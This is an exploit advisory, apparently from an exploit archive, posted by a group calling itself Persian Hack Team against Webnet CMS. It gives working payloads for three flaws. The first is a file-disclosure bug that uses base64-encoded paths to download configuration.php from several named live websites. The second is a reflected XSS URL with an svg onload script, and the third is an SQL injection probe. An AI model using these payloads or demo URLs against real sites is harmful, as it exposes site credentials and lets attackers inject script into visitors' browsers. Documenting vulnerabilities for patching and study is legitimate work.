###################### # Exploit Title : Webnet CMS Multiple Vulnerabilities # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.webnet.ir/ # Homepage : http://www.persian-team.ir # Date: 2016/04/15 # Version : 1.2 ###################### # POC: # # 1-LFD(Local File Dislocation) # Explain : # ids Parameter encode base64 Path , you can use base64_decode("Value Parameter") to see the path # For Example : # <?php print(base64_decode("L2hvbWUvZ3BwYXJzL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZ3VyYXRpb24ucGhw")) ?> # Result : /home/gppars/public_html/includes/configuration.php # Demo : # # http://www.rayaniroo.ir/download.php?ids=L2hvbWUvcmF5YW5pcm9vL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZ3VyYXRpb24ucGhw&filename=configuration.php # http://www.gp-pars.ir/download.php?filename=configuration.php&ids=L2hvbWUvZ3BwYXJzL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZ3VyYXRpb24ucGhw # http://www.greenrefahtea.com/download.php?filename=configuration.php&ids=L2hvbWUvZ3JlZW5yZWYvcHVibGljX2h0bWwvaW5jbHVkZXMvY29uZmlndXJhdGlvbi5waHA= # http://iran-tea.ir/download.php?filename=configuration.php&ids=L2hvbWUvZ3JlZW5yZWYvcHVibGljX2h0bWwvaW5jbHVkZXMvY29uZmlndXJhdGlvbi5waHA= # http://www.eastshop.ir/download.php?filename=configuration.php&ids=L2hvbWUvZWFzdHNob3AvcHVibGljX2h0bWwvaW5jbHVkZXMvY29uZmlndXJhdGlvbi5waHA= # # 2-XSS # http://www.gp-pars.ir/?option=com_tour&view=cat&Itmid=-2%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&id=21&title=%D8%AA%D9%88%D8%B1%20%D9%82%D8%B4%D9%85 # http://iran-tea.ir/?option=com_store&view=product&Itmid=-2%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team # # 3-Sql Injection # http://iran-tea.ir/?option=com_store&view=product&Itmid=-2%27 ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) # Greetz : FireKernel And Milad_Hacking # Homepage : http://www.persian-team.ir ######################